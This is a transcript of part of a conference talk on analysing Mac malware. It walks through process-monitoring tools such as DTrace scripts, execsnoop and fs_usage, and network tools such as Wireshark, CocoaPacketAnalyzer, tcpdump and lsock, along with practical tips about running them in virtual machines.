Read previous part: Reverse Engineering Mac Malware 4 - File Analysis
Sarah Edwards now makes an emphasis on such fundamentals of scrutinizing Mac malware as process analysis and network analysis, with tools and examples included.
Process analysis - you got a couple of Dtrace scripts, some fs_usage again, and some more data on applications.
So, we want to snoop new processes, we want to see what’s being executed, what’s spawning new processes. Newproc.d shows us if it’s a process with the parent processes, timestamp, whether it’s a 32-bit or 64-bit executable, it has command line arguments and things like that. A couple of examples here I’ll point out. One of the lines at the top is when I double-clicked the Notes application; it had a bunch of different things executing with it: framework stuff, XPC stuff – it’s all services. I did a ‘man’, ‘ifconfig’. It’s quick and easy. And I did an ‘open -a TextWrangler’, I opened the TextWrangler from the command line. So, interesting information there.
Then, with new processes we use ‘execsnoop’. This is one of my favorites. It does the relative time, it does the current time, UID, PID, parent ID, and arguments. Pretty darn concise, too, which is why I like it. You easily see on the command line what’s getting run at that time. It is not too verbose.
Again, fs_usage, the ‘-f exec’ filter – a lot of the same information: timestamp, new process, new path.
It confers ‘posix_spawn’, that’s across one process; ‘execve’ is a new process. You see ‘bin’, ‘sh’, ‘man’, ‘tbl’, ‘groff’ – these are all command line tools that we might be interested in. Malware might be using some different ones; that’s basically the Domino Man page lookup.
Real-time process analysis. This is basically a Terminal version, Mac version of Process Explorer. It’s equipped with a few more functionalities and coloring.
The screenshot sucks, I know. But you can’t make Terminal stuff look good, it’s just impossible. We have a bunch of different columns here. It’s interactive, so you can click down, press Enter and more information will pop up about that process; this is shown in the lower screenshot. I can see it’s 64-bit, I can see the size of virtual memory it’s using, what other processes are executing underneath it, things like that.
Then, of course, we have the Activity Monitor. This is, obviously, native. Whenever a process is taking up a lot of RAM on your computer and you are wondering why it’s so hot and the fan is running so hard, this is what you are going to open up and kill the process. It’s very much like the Task Manager on Windows, pretty much the same thing.
So, network analysis. Wireshark is always popular in the Windows world. There’s also the CocoaPacketAnalyzer, let’s get into it.
So, CocoaPacketAnalyzer is a Mac-only tool. It’s very similar to Wireshark. It’s kind of interesting because it caches packets, so it’s not completely live, which bugs the hell out of me. But it is really nice. When it comes down to it, it’s pretty damn slick.
Let’s move on to Wireshark, the all time favorite. I had a hell of a time when I was running this software in VMs. I usually have a clean VM and dirty VM while doing analysis. Wireshark will not frickin’ install on 10.7 or 10.8 systems in a VM. It shows up blank, and I’m like: “Are you kidding me? What am I doing wrong?” I know some VMs can be a little bit buggy, especially when it comes to video stuff. When you have to open up Safari or open up iWork stuff, you will have a full page of text that will show up blank. So it has some issues, be aware of that. Wireshark does work in a 10.9 VM. So FYI: it’s not you, it’s that.
So, command line version – we got two options. We got good ol’ tcpdump, getting a couple of options here: one with content and one without content. I like to see the content of the packets when it’s rolling through, see if it’s peeking into certain things – I want to see that live, so I personally like the option with content.
You can also do network analysis with Activity Monitor. You can see which applications are using more network throughput.
And one more, this is like a TCP view type of thing, it’s called ‘lsock’. It was written by the guy who did the new OS X Internals book. Look it up, it’s a great book; I highly recommend it. I read it at night.
And with that being said, thanks for your attention!